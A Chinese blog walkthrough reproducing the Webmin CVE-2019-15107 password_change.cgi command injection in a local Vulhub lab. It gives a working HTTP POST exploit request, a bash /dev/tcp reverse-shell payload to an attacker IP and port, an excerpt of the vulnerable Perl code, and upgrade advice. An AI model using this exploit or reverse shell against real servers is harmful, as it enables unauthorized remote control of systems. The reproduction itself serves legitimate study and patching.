Webmin (CVE-2019-15107) 远程命令执行漏洞复现

2023-10-15 03:04

本文主要是介绍Webmin (CVE-2019-15107) 远程命令执行漏洞复现,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

文章目录

  • Webmin 远程命令执行漏洞
    • 1. 漏洞编号
    • 2. 漏洞描述
    • 3. 影响版本
    • 4. 利用方法(利用案例)
      • 4.1 启动环境
      • 4.2 漏洞复现
      • 4.3 深度利用
      • 4.4 漏洞原因
    • 5. 附带文件
    • 6. 加固建议
    • 7. 参考信息
    • 8. 漏洞分类

Webmin 远程命令执行漏洞

1. 漏洞编号

CVE-2019-15107

2. 漏洞描述

Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。

3. 影响版本

漏洞影响版本为Webmin<=1.920

4. 利用方法(利用案例)

4.1 启动环境

image-20231012170055010

访问靶场地址https://127.0.0.1:10000/

image-20231012170839696

访问https://127.0.0.1:10000/password_change.cgi

image-20231012190358098

4.2 漏洞复现

可以使用bp抓包然后修改数据包的方式

POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2

还可以使用HackBar,发送POST请求包,并添加攻击Payload

image-20231012190637087

然后发送数据包后,可以看到在页面的回显中,出现了我们插入的id命令的结果。

4.3 深度利用

尝试执行反弹shell命令

先将payload进行URL编码

bash -c "bash -i >& /dev/tcp/192.168.188.185/4444 0>&1"

image-20231012191702397

kali监听4444端口,发送数据包

image-20231012191655140

kali反弹成功

image-20231012191721087

4.4 漏洞原因

出问题的地方就是这个password_change.cgi

  1 #!/usr/bin/perl2 # password_change.cgi3 # Actually update a user's password by directly modifying /etc/shadow4 5 BEGIN { push(@INC, "."); };6 use WebminCore;7 8 $ENV{'MINISERV_INTERNAL'} || die "Can only be called by miniserv.pl";9 &init_config();10 &ReadParse();11 &get_miniserv_config(\%miniserv);12 $miniserv{'passwd_mode'} == 2 || die "Password changing is not enabled!";13 14 # Validate inputs15 $in{'new1'} ne '' || &pass_error($text{'password_enew1'});16 $in{'new1'} eq $in{'new2'} || &pass_error($text{'password_enew2'});17 18 # Is this a Webmin user?19 if (&foreign_check("acl")) {20         &foreign_require("acl", "acl-lib.pl");21         ($wuser) = grep { $_->{'name'} eq $in{'user'} } &acl::list_users();22         if ($wuser->{'pass'} eq 'x') {23                 # A Webmin user, but using Unix authentication24                 $wuser = undef;25                 }26         elsif ($wuser->{'pass'} eq '*LK*' ||27                $wuser->{'pass'} =~ /^\!/) {28                 &pass_error("Webmin users with locked accounts cannot change ".29                             "their passwords!");30                 }31         }32 if (!$in{'pam'} && !$wuser) {33         $miniserv{'passwd_cindex'} ne '' && $miniserv{'passwd_mindex'} ne '' ||34                 die "Missing password file configuration";35         }37 if ($wuser) {38         # Update Webmin user's password39         $enc = &acl::encrypt_password($in{'old'}, $wuser->{'pass'});40         $enc eq $wuser->{'pass'} || &pass_error($text{'password_eold'},qx/$in{'old'}/);41         $perr = &acl::check_password_restrictions($in{'user'}, $in{'new1'});42         $perr && &pass_error(&text('password_enewpass', $perr));43         $wuser->{'pass'} = &acl::encrypt_password($in{'new1'});44         $wuser->{'temppass'} = 0;45         &acl::modify_user($wuser->{'name'}, $wuser);46         &reload_miniserv();47         }48 elsif ($gconfig{'passwd_cmd'}) {49         # Use some configured command50         $passwd_cmd = &has_command($gconfig{'passwd_cmd'});51         $passwd_cmd || &pass_error("The password change command <tt>$gconfig{'passwd_cmd'}</tt> was not found");52 53         &foreign_require("proc", "proc-lib.pl");54         &clean_environment();55         $ENV{'REMOTE_USER'} = $in{'user'};      # some programs need this56         $passwd_cmd .= " ".quotemeta($in{'user'});57         ($fh, $fpid) = &proc::pty_process_exec($passwd_cmd, 0, 0);58         &reset_environment();59         while(1) {60                 local $rv = &wait_for($fh,61                            '(new|re-enter).*:',62                            '(old|current|login).*:',63                            'pick a password',64                            'too\s+many\s+failures',65                            'attributes\s+changed\s+on|successfully\s+changed',66                            'pick your passwords');67                 $out .= $wait_for_input;68                 sleep(1);69                 if ($rv == 0) {

5. 附带文件

6. 加固建议

漏洞修复:

  • 升级到1.930版本

  • 在github上下载password_change.cgi文件

7. 参考信息

参考信息

  • Vulhub - Docker-Compose file for vulnerability environment。

  • exploit-db.com/exploits/47230

  • Webmin 0day 远程代码执行 (firosolutions.com)

8. 漏洞分类

远程命令执行漏洞(RCE)

这篇关于Webmin (CVE-2019-15107) 远程命令执行漏洞复现的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/214950

相关文章

一文详解Git中分支本地和远程删除的方法

《一文详解Git中分支本地和远程删除的方法》在使用Git进行版本控制的过程中,我们会创建多个分支来进行不同功能的开发,这就容易涉及到如何正确地删除本地分支和远程分支,下面我们就来看看相关的实现方法吧... 目录技术背景实现步骤删除本地分支删除远程www.chinasem.cn分支同步删除信息到其他机器示例步骤

Golang如何对cron进行二次封装实现指定时间执行定时任务

《Golang如何对cron进行二次封装实现指定时间执行定时任务》:本文主要介绍Golang如何对cron进行二次封装实现指定时间执行定时任务问题,具有很好的参考价值,希望对大家有所帮助,如有错误... 目录背景cron库下载代码示例【1】结构体定义【2】定时任务开启【3】使用示例【4】控制台输出总结背景

postgresql数据库基本操作及命令详解

《postgresql数据库基本操作及命令详解》本文介绍了PostgreSQL数据库的基础操作,包括连接、创建、查看数据库,表的增删改查、索引管理、备份恢复及退出命令,适用于数据库管理和开发实践,感兴... 目录1. 连接 PostgreSQL 数据库2. 创建数据库3. 查看当前数据库4. 查看所有数据库

linux重启命令有哪些? 7个实用的Linux系统重启命令汇总

《linux重启命令有哪些?7个实用的Linux系统重启命令汇总》Linux系统提供了多种重启命令,常用的包括shutdown-r、reboot、init6等,不同命令适用于不同场景,本文将详细... 在管理和维护 linux 服务器时,完成系统更新、故障排查或日常维护后,重启系统往往是必不可少的步骤。本文

nginx启动命令和默认配置文件的使用

《nginx启动命令和默认配置文件的使用》:本文主要介绍nginx启动命令和默认配置文件的使用,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录常见命令nginx.conf配置文件location匹配规则图片服务器总结常见命令# 默认配置文件启动./nginx

基于Python实现一个Windows Tree命令工具

《基于Python实现一个WindowsTree命令工具》今天想要在Windows平台的CMD命令终端窗口中使用像Linux下的tree命令,打印一下目录结构层级树,然而还真有tree命令,但是发现... 目录引言实现代码使用说明可用选项示例用法功能特点添加到环境变量方法一:创建批处理文件并添加到PATH1

Python远程控制MySQL的完整指南

《Python远程控制MySQL的完整指南》MySQL是最流行的关系型数据库之一,Python通过多种方式可以与MySQL进行交互,下面小编就为大家详细介绍一下Python操作MySQL的常用方法和最... 目录1. 准备工作2. 连接mysql数据库使用mysql-connector使用PyMySQL3.

Linux使用scp进行远程目录文件复制的详细步骤和示例

《Linux使用scp进行远程目录文件复制的详细步骤和示例》在Linux系统中,scp(安全复制协议)是一个使用SSH(安全外壳协议)进行文件和目录安全传输的命令,它允许在远程主机之间复制文件和目录,... 目录1. 什么是scp?2. 语法3. 示例示例 1: 复制本地目录到远程主机示例 2: 复制远程主

IDEA如何实现远程断点调试jar包

《IDEA如何实现远程断点调试jar包》:本文主要介绍IDEA如何实现远程断点调试jar包的问题,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录问题步骤总结问题以jar包的形式运行Spring Boot项目时报错,但是在IDEA开发环境javascript下编译

Java -jar命令如何运行外部依赖JAR包

《Java-jar命令如何运行外部依赖JAR包》在Java应用部署中,java-jar命令是启动可执行JAR包的标准方式,但当应用需要依赖外部JAR文件时,直接使用java-jar会面临类加载困... 目录引言:外部依赖JAR的必要性一、问题本质:类加载机制的限制1. Java -jar的默认行为2. 类加